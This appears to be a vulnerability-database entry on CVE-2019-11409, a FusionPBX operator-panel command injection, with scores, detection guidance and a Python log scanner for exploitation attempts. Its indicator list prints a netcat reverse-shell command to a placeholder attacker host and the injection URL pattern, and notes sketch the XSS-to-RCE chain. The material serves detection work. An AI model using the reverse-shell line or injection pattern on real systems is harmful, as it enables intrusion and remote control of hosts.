CVE-2019-11409
published 2019-06-17


Priority: P2 (score 75, high)
CVSS 3.1 base score: 8.8 (vector AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Exploit: public exploit available
EPSS: 87.48% (99.7th percentile)
app/operator_panel/exec.php in the Operator Panel module in FusionPBX 4.4.3 suffers from a command injection vulnerability due to a lack of input validation that allows authenticated non-administrative attackers to execute commands on the host. This can further lead to remote code execution when combined with an XSS vulnerability also present in the FusionPBX Operator Panel module.

Affected (1 range)

Vendor: fusionpbx
Product: fusionpbx
Version range: (not stated on this page)
Fixed in: (not stated on this page)

Detection & IOCs (extracted from sources)

path: app/operator_panel/exec.php
url: /app/operator_panel/exec.php?cmd=bg_system+<cmd>
command: bg_system <cmd>
command: system <cmd>
command: nc -e /bin/bash <attacker_ip> <attacker_port>
port: 5080
  • Detect GET requests to /app/operator_panel/exec.php with a 'cmd' parameter containing 'bg_system' or 'system' — these are the FreeSWITCH event socket commands used to achieve command injection.
  • Alert on HTTP responses from exec.php containing the string 'access denied' as a negative indicator; absence of this string with a 200 response confirms successful exploitation.
  • Detect XMLHttpRequest calls originating from the operator panel page to exec.php with a 'cmd' parameter — this is the XSS-to-RCE pivot pattern.
  • Flag POST requests to /core/user_settings/user_dashboard.php followed immediately by GET requests to /app/operator_panel/exec.php from the same session — this is the login-then-exploit sequence used by the Metasploit module.
  • The exploit requires operator_panel_view or administrator permissions; audit FusionPBX user accounts with these roles as a hardening measure.
  • Exploitation requires authentication; the attacker must have valid credentials with at least 'operator_panel_view' permissions. Unauthenticated exploitation is only possible when chained with the XSS (CVE-2019-11408) to steal a session cookie.
  • The Metasploit module defaults to SSL on port 443; detections should cover both HTTP and HTTPS traffic to the target paths.
  • The standalone PoC exploit (EDB-46985) chains CVE-2019-11408 (XSS) with CVE-2019-11409 (command injection) and does not require prior authentication — it injects the XSS via a SIP INVITE on port 5080 to steal an operator session and then calls exec.php.
  • Bad characters in payloads are null byte, newline, carriage return, single quote, and backslash — payload encoding must account for these when crafting custom detections.
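The first and fourth detection bullets above can be turned into a small log scanner. The following is an added example, not code from this CVE record, FusionPBX or the Metasploit module: it parses constructed access-log lines (combined-style format with a trailing `sess=` field standing in for the session cookie, both assumptions) and raises one alert for any request to exec.php whose decoded `cmd` parameter starts with `bg_system` or `system`, plus a second alert when such a request follows a POST to the user_dashboard.php login endpoint from the same session. Response bodies are not in access logs, so the 'access denied' check from the second bullet is not modelled; the HTTP status is recorded so analysts can prioritise 200 responses.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample log lines (assumption: combined-style access log with a
# trailing "sess=<cookie>" field added by the web server's log format).
SAMPLE_LOG = """\
10.0.0.5 - - [17/Jun/2019:10:01:02 +0000] "POST /core/user_settings/user_dashboard.php HTTP/1.1" 302 0 "-" "Mozilla" sess=abc123
10.0.0.5 - - [17/Jun/2019:10:01:03 +0000] "GET /app/operator_panel/exec.php?cmd=bg_system+id HTTP/1.1" 200 45 "-" "Mozilla" sess=abc123
10.0.0.9 - - [17/Jun/2019:10:02:00 +0000] "GET /app/operator_panel/index.php HTTP/1.1" 200 1200 "-" "Mozilla" sess=def456
10.0.0.9 - - [17/Jun/2019:10:02:10 +0000] "GET /app/operator_panel/exec.php?cmd=status HTTP/1.1" 200 30 "-" "Mozilla" sess=def456
10.0.0.7 - - [17/Jun/2019:10:03:00 +0000] "GET /app/operator_panel/exec.php?cmd=system%20whoami HTTP/1.1" 200 20 "-" "Mozilla" sess=ghi789
"""

LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "[^"]*" sess=(?P<sess>\S+)$'
)

EXEC_PATH = "/app/operator_panel/exec.php"          # path from the IOC list
LOGIN_PATH = "/core/user_settings/user_dashboard.php"  # login endpoint from bullet 4
SUSPICIOUS_CMDS = ("bg_system", "system")           # event socket verbs from bullet 1


def parse_line(line):
    """Parse one log line into a dict, or return None if it does not match."""
    m = LINE_RE.match(line)
    return m.groupdict() if m else None


def cmd_param(target):
    """Return the URL-decoded 'cmd' query value of a request target, or None."""
    vals = parse_qs(urlsplit(target).query).get("cmd")
    return vals[0] if vals else None


def is_system_cmd(cmd):
    """True when the first word of the command is one of the flagged verbs."""
    words = cmd.strip().split(None, 1)
    return bool(words) and words[0] in SUSPICIOUS_CMDS


def scan(log_text):
    """Return a list of alert dicts for the two detection patterns."""
    alerts = []
    last_login = {}  # session id -> timestamp of the most recent dashboard POST
    for raw in log_text.splitlines():
        rec = parse_line(raw)
        if rec is None:
            continue
        path = urlsplit(rec["target"]).path
        if rec["method"] == "POST" and path == LOGIN_PATH:
            last_login[rec["sess"]] = rec["ts"]
            continue
        if path != EXEC_PATH:
            continue
        cmd = cmd_param(rec["target"])
        if cmd is None or not is_system_cmd(cmd):
            continue
        base = {"ip": rec["ip"], "sess": rec["sess"], "cmd": cmd,
                "status": rec["status"], "ts": rec["ts"]}
        alerts.append(dict(base, rule="exec_system_cmd"))
        # Login-then-exploit sequence: dashboard POST then exec.php, same session.
        if rec["sess"] in last_login:
            alerts.append(dict(base, rule="login_then_exec",
                               login_ts=last_login.pop(rec["sess"])))
    return alerts


if __name__ == "__main__":
    for a in scan(SAMPLE_LOG):
        print(a["rule"], a["ip"], a["sess"], repr(a["cmd"]), a["status"])
```

The `cmd=status` request from session def456 is deliberately left unflagged: exec.php also serves legitimate operator panel requests, so matching the verb rather than the path alone keeps the rule from firing on every panel refresh.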

CVSS provenance

Source: nvd, CVSS v3.1, 8.8 HIGH, vector CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Source: nvd, CVSS v2.0, 6.5 MEDIUM, vector AV:N/AC:L/Au:S/C:P/I:P/A:P